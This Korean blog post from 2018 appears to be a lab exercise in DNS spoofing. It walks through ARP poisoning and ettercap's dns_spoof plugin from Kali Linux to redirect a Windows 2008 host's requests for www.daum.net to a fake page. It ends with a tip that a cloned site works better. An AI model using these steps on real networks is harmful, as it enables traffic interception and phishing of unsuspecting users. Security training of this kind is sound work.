Self-Improvement

ettercap을 이용한 DNS Spoofing 간단 실습 본문

Kali Linux/Tools 실습

ettercap을 이용한 DNS Spoofing 간단 실습

JoGeun 2018. 10. 20. 14:05

*DNS Spoofing
 시나리오 : win2008이 www.Daum.net을 요청시 firewall 통해 외부 DNS서버에게 요청을 하지만 kali가 ARP Spoofing을 통해 win2008에게 외부 DNS보다 빠르게 Fake WEB(www.daum.net)을 제공하는 것

 //작업순서
 1.Fake WEB
 2.ARP Spoofing + IP Forwarding (ARP Spoofing은 Ettercap툴 사용)
 3.Fake DNS (DNS Spoofing, Ettercap툴로 사용)

 (kali)
 #fragrouter -B1 (IP포워딩을 위한 명령어)
 #wiresark &
 #ls /et/apache/apache2.conf (주설정파일 있는지 확인)
 #ls /var/www/html/index.html (index.html있는지 확인)
 #echo "Fake Web Site" > /var/www/html/index.html
 #cat /var/www/html/index.html

 #service apache2 restart
 #firefox localhost

 #cd /etc/ettercap
 #vi etter.dns

 #ettercap -G &
 -------------------------설정--------------------------------
 Sniff > Unfied sniffing > eth1
 Hosts > Scan for host
 Hosts > Host list
 192.168.20.100 선택 -> Add to Target 1
 192.168.20.201 선택 -> Add to Target 2
 Mitm > Arp poisoning > Optional parameter
    Sniff remote connection
 Plugins > Manage the plugins > dns_spoof 더블클릭
 Start > Start sniffing
 -----------------------------------------------------------

 wireshark로 ARP Spoofing이 되고 있는지 확인


(win2008)
 c:>arp -a (ARP Spoofing된거 확인)

gateway인 192.168.92.50의 mac주소가 kali로 되어 있는거 확인

 c:>ipconfig /flushdns (캐시를 제거)
 웹 브라우저로 www.daum.net로 접속해본다.

kali의 웹사이트가 나오게 된다.

 c:>ipconfig /displaydns

www.daum.net의 주소가 kali의 주소로 되어있다.


 (kali)
 Ettercap툴 종료
 mitm > Stop mitm attack
 Start > Stop sniffing

※사이트 클론까지 만들어 놓으면 더욱 효과적